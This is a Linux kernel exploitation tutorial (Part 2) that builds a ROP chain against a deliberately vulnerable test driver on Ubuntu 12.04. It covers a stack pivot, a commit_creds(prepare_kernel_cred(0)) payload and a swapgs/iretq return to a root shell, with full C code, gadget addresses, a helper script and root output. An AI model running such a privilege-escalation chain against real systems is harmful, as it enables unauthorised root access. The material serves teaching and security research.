Linux Kernel ROP - Ropping your way to # (Part 2)


In Part 1 of this tutorial, we demonstrated how to find useful ROP gadgets and build a privilege escalation ROP chain for our test system (3.13.0-32 kernel - Ubuntu 12.04.5 LTS). We also developed a vulnerable kernel driver that allows arbitrary code execution. In this part, we will use this kernel module to demonstrate the ROP chain in practice: escalate privileges, fix up the system state and perform a clean "exit" to user space.

The following is a list of requirements for the ROP chain from Part 1:

  • Execute a privilege escalation payload
  • Data residing in user space may be referenced (i.e., "fetching" data from user space is allowed)
  • Instructions residing in user space may not be executed

The vulnerable kernel module demonstrated in Part 1 allowed setting a function pointer to an arbitrary memory address because the offset is not bounds-checked. Our simple trigger code is shown below for reference:

#define DEVICE_PATH "/dev/vulndrv"

int main(int argc, char **argv) {
        int fd;
        struct drv_req req;

        req.offset = atoll(argv[1]);

        fd = open(DEVICE_PATH, O_RDONLY);

        if (fd == -1) {
                perror("open");
                return -1;
        }

        ioctl(fd, 0, &req);

        return 0;
}

In the code snippet above, we control the request offset value which is declared as unsigned long in our vulnerable kernel module. Using this offset value, we can reference any kernel or user-space memory address.

Stack Pivot

Since we cannot redirect kernel control flow to a user-space address, we need to look for a suitable gadget in kernel space. The idea is to prepare our ROP chain in user space and then set the stack pointer to the beginning of this ROP chain. That way, we are not executing instructions residing in user space directly but rather fetching pointers from user space to instructions in kernel space.

Setting a breakpoint at the entry point of our vulnerable function device_ioctl(), we can examine registers that are either 'static' (have a somewhat fixed value between device_ioctl() invocations) or that we control before the function pointer is dereferenced:

0xffffffffa013d0bd <device_ioctl>       nopl   0x0(%rax,%rax,1) 
0xffffffffa013d0c2 <device_ioctl+5>     push   %rbp
0xffffffffa013d0c3 <device_ioctl+6>     mov    %rsp,%rbp
0xffffffffa013d0c6 <device_ioctl+9>     sub    $0x30,%rsp
0xffffffffa013d0ca <device_ioctl+13>    mov    %rdi,-0x18(%rbp)
0xffffffffa013d0ce <device_ioctl+17>    mov    %esi,-0x1c(%rbp)
0xffffffffa013d0d1 <device_ioctl+20>    mov    %rdx,-0x28(%rbp)           [user-space address of passed req struct]
0xffffffffa013d0d5 <device_ioctl+24>    mov    -0x1c(%rbp),%eax
0xffffffffa013d0d8 <device_ioctl+27>    test   %eax,%eax
0xffffffffa013d0da <device_ioctl+29>    jne    0xffffffffa013d145 <device_ioctl+136>
0xffffffffa013d0dc <device_ioctl+31>    mov    -0x28(%rbp),%rax
0xffffffffa013d0e0 <device_ioctl+35>    mov    %rax,-0x10(%rbp)           [save req struct address to -0x10(%rbp)]
0xffffffffa013d0e4 <device_ioctl+39>    mov    -0x10(%rbp),%rax
0xffffffffa013d0e8 <device_ioctl+43>    mov    (%rax),%rax
0xffffffffa013d0eb <device_ioctl+46>    mov    %rax,%rsi
0xffffffffa013d0ee <device_ioctl+49>    mov    $0xffffffffa013e066,%rdi
0xffffffffa013d0f5 <device_ioctl+56>    mov    $0x0,%eax
0xffffffffa013d0fa <device_ioctl+61>    callq  0xffffffff81746ca3
0xffffffffa013d0ff <device_ioctl+66>    mov    -0x10(%rbp),%rax
0xffffffffa013d103 <device_ioctl+70>    mov    (%rax),%rax
0xffffffffa013d106 <device_ioctl+73>    shl    $0x3,%rax
0xffffffffa013d10a <device_ioctl+77>    add    $0xffffffffa013f340,%rax
0xffffffffa013d110 <device_ioctl+83>    mov    %rax,%rsi
0xffffffffa013d113 <device_ioctl+86>    mov    $0xffffffffa013e074,%rdi
0xffffffffa013d11a <device_ioctl+93>    mov    $0x0,%eax
0xffffffffa013d11f <device_ioctl+98>    callq  0xffffffff81746ca3
0xffffffffa013d124 <device_ioctl+103>   mov    $0xffffffffa013f340,%rdx
0xffffffffa013d12b <device_ioctl+110>   mov    -0x10(%rbp),%rax
0xffffffffa013d12f <device_ioctl+114>   mov    (%rax),%rax
0xffffffffa013d132 <device_ioctl+117>   shl    $0x3,%rax
0xffffffffa013d136 <device_ioctl+121>   add    %rdx,%rax
0xffffffffa013d139 <device_ioctl+124>   mov    %rax,-0x8(%rbp)
0xffffffffa013d13d <device_ioctl+128>   mov    -0x8(%rbp),%rax
0xffffffffa013d141 <device_ioctl+132>   callq  *%rax                      [1]
0xffffffffa013d143 <device_ioctl+134>   jmp    0xffffffffa013d146 <device_ioctl+137>
0xffffffffa013d145 <device_ioctl+136>   nop
0xffffffffa013d146 <device_ioctl+137>   mov    $0x0,%eax
0xffffffffa013d14b <device_ioctl+142>   leaveq
0xffffffffa013d14c <device_ioctl+143>   retq

At [1] (the callq *%rax instruction at device_ioctl+132), the $rax register contains the address of the instruction to be executed. We can compute this address in advance since we know both the ops array base address and the passed offset value: the address of the function pointer fn() is the base plus the offset multiplied by 8 (the shl $0x3 above). For example, given the ops base address 0xffffffffaaaaaaaf and offset = 0x6806288, the fn address becomes 0xffffffffdeadbeef.
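
The address arithmetic can be replayed outside the kernel. The following is a minimal Python sketch, not part of the original exploit; the helper name fn_address is made up for illustration, and the only inputs are the example values quoted in the text.

```python
MASK64 = (1 << 64) - 1  # registers are 64 bits wide, so arithmetic wraps


def fn_address(ops_base, offset):
    """Replay `shl $0x3,%rax` followed by the add of the ops base."""
    scaled = (offset << 3) & MASK64      # offset * sizeof(pointer)
    return (ops_base + scaled) & MASK64  # address that callq *%rax jumps to


# Example values from the text.
print(hex(fn_address(0xffffffffaaaaaaaf, 0x6806288)))  # 0xffffffffdeadbeef
```

Because the result is reduced modulo 2^64, a very large unsigned offset behaves like a negative index, which is how addresses below the ops array can be reached.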

We can reverse this logic and try to find the offset value that would give us the desired target address to execute in kernel space. There are many stack pivot gadgets. For example, the following are common stack pivots encountered in user-space ROP chains:

  • mov %rXx, %rsp ; ret
  • add ..., %rsp ; ret
  • xchg %rXx, %rsp ; ret

With arbitrary code execution in kernel space, we need to set our stack pointer to a user-space address that we control. Even though our test environment is 64-bit, we're interested in the last stack pivot gadget but with 32-bit registers, i.e., xchg %eXx, %esp ; ret or xchg %esp, %eXx ; ret. If $rXx contains a valid kernel memory address (e.g., 0xffffffffXXXXXXXX), this stack pivot sets the lower 32 bits of $rXx (0xXXXXXXXX, which is a user-space address) as the new stack pointer, because writing a 32-bit register clears the upper 32 bits of the corresponding 64-bit register. Since the $rax value is known right before executing fn(), we know exactly where our new user-space stack will be and can mmap it accordingly.
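
The effect of the 32-bit exchange can be modelled in a few lines. This is only an illustrative Python sketch: the function name xchg_eax_esp and the kernel stack value are hypothetical, and the $rax value is one of the gadget addresses that appears later in this tutorial.

```python
MASK32 = 0xffffffff


def xchg_eax_esp(rax, rsp):
    """Model `xchg %eax, %esp`: swap the low halves. Writing a 32-bit
    register zero-extends the result into the full 64-bit register."""
    return rsp & MASK32, rax & MASK32  # (new rax, new rsp)


# rax holds a kernel address; rsp is a made-up kernel stack pointer.
new_rax, new_rsp = xchg_eax_esp(rax=0xffffffff8108e258, rsp=0xffff880012345e98)
print(hex(new_rsp))  # 0x8108e258
```

The new stack pointer falls in the lower 4 GB of the address space, which a user-space process can map.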

Using the ROPGadget tool from Part 1, we can see that there are many suitable xchg stack pivots in the kernel image:

0xffffffff81000085 : xchg eax, esp ; ret
0xffffffff81576254 : xchg eax, esp ; ret 0x103d
0xffffffff810242a6 : xchg eax, esp ; ret 0x10a8
0xffffffff8108e258 : xchg eax, esp ; ret 0x11e8
0xffffffff81762182 : xchg eax, esp ; ret 0x12eb
0xffffffff816f4a04 : xchg eax, esp ; ret 0x13e9
0xffffffff81a196fc : xchg eax, esp ; ret 0x1408
0xffffffff814bd0fd : xchg eax, esp ; ret 0x148
0xffffffff8119e39b : xchg eax, esp ; ret 0x148d
0xffffffff813f8ce5 : xchg eax, esp ; ret 0x14c
0xffffffff810db968 : xchg eax, esp ; ret 0x14ff
0xffffffff81d5953e : xchg eax, esp ; ret 0x1589
0xffffffff81951aee : xchg eax, esp ; ret 0x1d07
0xffffffff81703efe : xchg eax, esp ; ret 0x1f3c

The only caveat when choosing a stack pivot gadget is that its address must be 8-byte aligned: ops is an array of 8-byte pointers with a properly aligned base address, so only addresses of the form base + 8 * offset can be reached. The following simple script can be used to find a suitable gadget:

#!/usr/bin/env python
import sys

base_addr = int(sys.argv[1], 16)

f = open(sys.argv[2], 'r') # gadgets

for line in f.readlines():
        target_str, gadget = line.split(':', 1)
        target_addr = int(target_str, 16)

        # check alignment: skip gadgets that ops[offset] cannot reach
        if target_addr % 8 != 0:
                continue

        # negative index, printed as the equivalent unsigned 64-bit value
        offset = (target_addr - base_addr) // 8
        print('offset = %d' % ((1 << 64) + offset))
        print('gadget = %s' % gadget.strip())
        print('stack addr = %x' % (target_addr & 0xffffffff))
        break # stop at the first suitable gadget

f.close()

vnik@ubuntu:~$ cat ropgadget | grep ': xchg eax, esp ; ret' > gadgets
vnik@ubuntu:~$ ./ 0xffffffffa0224340 ./gadgets
offset = 18446744073644332003
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

The stack address above is the user-space address where the ROP chain needs to be mmaped (fake_stack):

unsigned long *fake_stack;

/* mmap needs MAP_PRIVATE (or MAP_SHARED); MAP_ANONYMOUS because no file backs the mapping */
mmap_addr = stack_addr & 0xfffff000;
assert((mapped = mmap((void*)mmap_addr, 0x2000, PROT_EXEC|PROT_READ|PROT_WRITE,
	MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, -1, 0)) == (void*)mmap_addr);

fake_stack = (unsigned long *)(stack_addr);
*fake_stack++ = 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

The ret instruction in the chosen stack pivot has a numeric operand. A ret with no operand pops the return address off the stack and jumps to it. However, in some calling conventions (e.g., Microsoft __stdcall), the callee is responsible for cleaning up the stack. In that case, ret takes an operand giving the number of additional bytes to pop off the stack after the return address has been popped. Hence, the second ROP gadget after the stack pivot is positioned at offset 0x11e8 + 8: once the stack pivot is executed, control is transferred to the first gadget at stack_addr, but the stack pointer has already advanced to stack_addr + 8 + 0x11e8.
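
To make the 0x11e8 + 8 offset concrete, here is a small Python model of ret with an immediate operand. It is a sketch for illustration only; the helper name ret_imm and the dictionary standing in for memory are assumptions, while the addresses are the ones used above.

```python
def ret_imm(memory, rsp, imm):
    """Model `ret imm16`: pop the 8-byte return address, then discard imm bytes."""
    rip = memory[rsp]          # next gadget is read from the top of the stack
    return rip, rsp + 8 + imm  # stack pointer after the instruction completes


stack_addr = 0x8108e258
memory = {stack_addr: 0xffffffff810c9ebd}  # pop %rdi; ret
rip, rsp = ret_imm(memory, stack_addr, 0x11e8)
print(hex(rip), hex(rsp))  # 0xffffffff810c9ebd 0x8108f448
```

The second value is where the rest of the chain has to start, and it still lies inside the 0x2000-byte mapping that begins at 0x8108e000.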


Referring to the stack layout from Part 1, we can prepare the ROP chain in user space as follows:

fake_stack = (unsigned long *)(stack_addr);

*fake_stack++ = 0xffffffff810c9ebdUL;   /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

*fake_stack++ = 0x0UL;                  /* NULL */
*fake_stack++ = 0xffffffff81095430UL;   /* prepare_kernel_cred() */
*fake_stack++ = 0xffffffff810dc796UL;   /* pop %rdx; ret */
//*fake_stack++ = 0xffffffff81095190UL; /* commit_creds() */
*fake_stack++ = 0xffffffff81095196UL;   /* commit_creds() + 2 instructions */
*fake_stack++ = 0xffffffff81036b70UL;   /* mov %rax, %rdi; call %rdx */

We've made some modifications to the ROP chain from Part 1. In particular, the commit_creds() address was shifted past its first 2 instructions. The reason is that we're using a call instruction to execute commit_creds(). The call instruction saves a return address on the stack before transferring control to the first instruction of commit_creds(). Like any other function, commit_creds() has a prologue and an epilogue that push values on the stack and pop them off again before returning. Hence, once the function finishes, control is transferred to the saved return address. We, however, want to transfer it to the next gadget in the ROP chain. To use the call instruction as a ROP gadget, we can simply skip one of the push instructions in the prologue:

(gdb) x/10i 0xffffffff81095190
0xffffffff81095190      nopl   0x0(%rax,%rax,1)
0xffffffff81095195      push   %rbp
0xffffffff81095196      mov    %rsp,%rbp
0xffffffff81095199      push   %r13
0xffffffff8109519b      mov    %gs:0xc7c0,%r13
0xffffffff810951a4      push   %r12
0xffffffff810951a6      push   %rbx
0xffffffff810951a7      mov    %rdi,%rbx
0xffffffff810951aa      sub    $0x8,%rsp
0xffffffff810951ae      mov    0x498(%r13),%r12

Skipping push %rbp (and the preceding nop) allows us to use the call instruction as a ROP gadget: with one push fewer in the prologue, the epilogue's pops also consume the saved return address, and ret transfers control to the next gadget in the chain.
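
The stack bookkeeping behind this trick can be checked with a toy model. The Python sketch below is illustrative only: the pushes follow the prologue shown in the gdb listing, but the epilogue (add $0x8,%rsp, then pops of rbx, r12, r13 and rbp) is an assumption, since it is not listed here, and the function name ret_target is made up.

```python
def ret_target(skip_push_rbp):
    """Return what the final `ret` of commit_creds() jumps to.

    The stack is a list whose last element is the top of the stack.
    """
    stack = ["next ROP gadget"]          # chain entry that follows `call %rdx`
    stack.append("call return address")  # pushed by the call instruction
    saved = ["r13", "r12", "rbx"]
    if not skip_push_rbp:
        saved.insert(0, "rbp")           # normal entry runs `push %rbp` first
    stack.extend(saved)                  # prologue pushes
    stack.append("scratch")              # sub $0x8,%rsp
    stack.pop()                          # assumed epilogue: add $0x8,%rsp
    for _ in ("rbx", "r12", "r13", "rbp"):
        stack.pop()                      # assumed epilogue: four pops
    return stack.pop()                   # ret


print(ret_target(skip_push_rbp=False))  # call return address
print(ret_target(skip_push_rbp=True))   # next ROP gadget
```

Entering at commit_creds() + 6 bytes leaves the epilogue with one more pop than the prologue had pushes, so the final ret lands on the chain instead of on the instruction after the call.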


The ROP chain described above will give our calling process superuser privileges. However, once all ROP gadgets are executed, the control will be transferred to the next instruction on the stack which is some uninitialised memory value. We need to somehow restore the stack pointer and transfer control back to our user-space process.

You might be aware that syscalls switch between kernel and user-space context all the time. Once a process executes a syscall, its state must be restored so that it can continue executing from the instruction after the syscall. One way to return from kernel space to the user-space process is the iret (interrupt return) instruction. However, iret (or iretq with 64-bit operands in our case) expects a certain stack layout: starting from the top of the stack, the saved RIP, CS, EFLAGS, RSP and SS.


We would need to extend our ROP chain to include a new user-space instruction pointer (RIP), mmaped user-space stack pointer (RSP), code and stack segment selectors (CS and SS), and EFLAGS register with various state information. The CS, SS and EFLAGS values can be obtained from the calling user-space process using the following save_state() function:

unsigned long user_cs, user_ss, user_rflags;

static void save_state() {
        asm(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"              /* push the flags register so it can be popped below */
        "popq %2\n"
        : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
}
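
The order in which iretq consumes these values matters when they are placed on the fake stack. The following Python sketch models that order; the function name iretq and all values are hypothetical (0x33 and 0x2b are the usual 64-bit user-space CS and SS selectors on x86-64 Linux, and the two addresses are placeholders).

```python
def iretq(stack):
    """Model the pops performed by iretq; stack[0] is the top of the stack."""
    rip, cs, rflags, rsp, ss = stack[:5]
    return {"rip": rip, "cs": cs, "rflags": rflags, "rsp": rsp, "ss": ss}


# Placeholder frame: user RIP, saved CS, saved flags, user RSP, saved SS.
frame = [0x400b60, 0x33, 0x246, 0x7ffd5000, 0x2b]
state = iretq(frame)
print({name: hex(value) for name, value in state.items()})
```

If any two entries are swapped, iretq loads a selector or stack pointer from the wrong slot, so the frame has to be written in exactly this order.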

The address of the iretq instruction in the kernel .text segment can be obtained using objdump:

vnik@ubuntu:~# objdump -j .text -d ~/vmlinux | grep iretq | head -1
ffffffff81053056:       48 cf                   iretq  

The last thing to note is that before executing iret, swapgs is required on 64-bit systems. This instruction swaps the GS base with a value held in one of the MSRs. At the entry to a kernel-space routine (e.g., a syscall), swapgs is executed to obtain a pointer to kernel data structures and hence, a matching swapgs is required before returning to user space.

We can now put all the pieces of the ROP chain together:


fake_stack = (unsigned long *)(stack_addr);

*fake_stack++ = 0xffffffff810c9ebdUL; /* pop %rdi; ret */

fake_stack = (unsigned long *)(stack_addr + 0x11e8 + 8);

*fake_stack++ = 0x0UL;                  /* NULL */
*fake_stack++ = 0xffffffff81095430UL;   /* prepare_kernel_cred() */
*fake_stack++ = 0xffffffff810dc796UL;   /* pop %rdx; ret */
*fake_stack++ = 0xffffffff81095196UL;   /* commit_creds() + 2 instructions */
*fake_stack++ = 0xffffffff81036b70UL;   /* mov %rax, %rdi; call %rdx */

*fake_stack++ = 0xffffffff81052804UL;   /* swapgs ; pop rbp ; ret */
*fake_stack++ = 0xdeadbeefUL;           /* dummy placeholder */

*fake_stack++ = 0xffffffff81053056UL;   /* iretq */
*fake_stack++ = (unsigned long)shell;   /* spawn a shell */
*fake_stack++ = user_cs;                /* saved CS */
*fake_stack++ = user_rflags;            /* saved EFLAGS */
*fake_stack++ = (unsigned long)(temp_stack+0x5000000);  /* mmaped stack region in user space */
*fake_stack++ = user_ss;                /* saved SS */
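
As a sanity check, the resulting memory layout can be tabulated offline. The Python sketch below mirrors the chain above under stated assumptions: build_fake_stack is a made-up helper, and the arguments passed to it (shell address, selectors, flags, user stack) are placeholders standing in for values that the real exploit obtains at run time.

```python
STACK_ADDR = 0x8108e258  # low 32 bits of the stack pivot address
RET_IMM = 0x11e8         # operand of the pivot's ret instruction


def build_fake_stack(shell, user_cs, user_rflags, user_rsp, user_ss):
    """Return {address: qword} for the chain listed above."""
    layout = {STACK_ADDR: 0xffffffff810c9ebd}  # pop %rdi; ret
    chain = [
        0x0,                 # NULL
        0xffffffff81095430,  # prepare_kernel_cred()
        0xffffffff810dc796,  # pop %rdx; ret
        0xffffffff81095196,  # commit_creds() + 2 instructions
        0xffffffff81036b70,  # mov %rax, %rdi; call %rdx
        0xffffffff81052804,  # swapgs ; pop rbp ; ret
        0xdeadbeef,          # dummy placeholder
        0xffffffff81053056,  # iretq
        shell, user_cs, user_rflags, user_rsp, user_ss,
    ]
    addr = STACK_ADDR + RET_IMM + 8  # first slot after the pivot's ret
    for value in chain:
        layout[addr] = value
        addr += 8
    return layout


# Placeholder user-space values, for illustration only.
layout = build_fake_stack(0x400b60, 0x33, 0x246, 0x7ffd5000, 0x2b)
for addr in sorted(layout):
    print("%#x: %#x" % (addr, layout[addr]))
```

Every entry lands between 0x8108e258 and 0x8108f4a8, inside the two pages mapped at 0x8108e000.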


The complete exploit for Ubuntu 12.04.5 (x64) can be found on GitHub. First, we need to obtain the array offset using the base address:

vnik@ubuntu:~$ dmesg | grep addr | grep ops
[  244.142035] addr(ops) = ffffffffa02e9340
vnik@ubuntu:~$ ~/ ffffffffa02e9340 ~/gadgets 
offset = 18446744073644231139
gadget = xchg eax, esp ; ret 0x11e8
stack addr = 8108e258

Then, pass the offset and the base address to the ROP exploit:

vnik@ubuntu:~/kernel_rop/vulndrv$ gcc rop_exploit.c -O2 -o rop_exploit
vnik@ubuntu:~/kernel_rop/vulndrv$ ./rop_exploit 18446744073644231139 ffffffffa02e9340
array base address = 0xffffffffa02e9340
stack address = 0x8108e258
# id    
uid=0(root) gid=0(root) groups=0(root)

And did we mention that this would bypass SMEP? :) There are easier ways to bypass SMEP. For example, clearing the SMEP bit (bit 20) in CR4 with a ROP gadget and then executing the rest of the privilege escalation payload (i.e., commit_creds(prepare_kernel_cred(0)) with iret) in user space. The goal of this tutorial was not to bypass a particular protection mechanism but to demonstrate that a kernel ROP chain (the entire payload) can be executed in kernel space as easily as ROP in user space. There are obvious downsides to kernel ROP: the main one is needing access to the kernel boot image (whose permissions default to 0600) to find gadgets. This is not an issue for stock kernels but could be problematic for custom kernels if there are no other memory leaks.
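
For the CR4 alternative mentioned above, the value a gadget would need to load can be computed as follows. This is a hedged Python sketch: clear_smep is a made-up helper and 0x1407f0 is only an example CR4 value, since the real one has to be read from the target system.

```python
X86_CR4_SMEP = 1 << 20  # SMEP enable bit in CR4


def clear_smep(cr4):
    """Return the CR4 value with the SMEP bit cleared and all other bits kept."""
    return cr4 & ~X86_CR4_SMEP


print(hex(clear_smep(0x1407f0)))  # 0x407f0
```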

If you have any comments, corrections or questions, you can post them below.
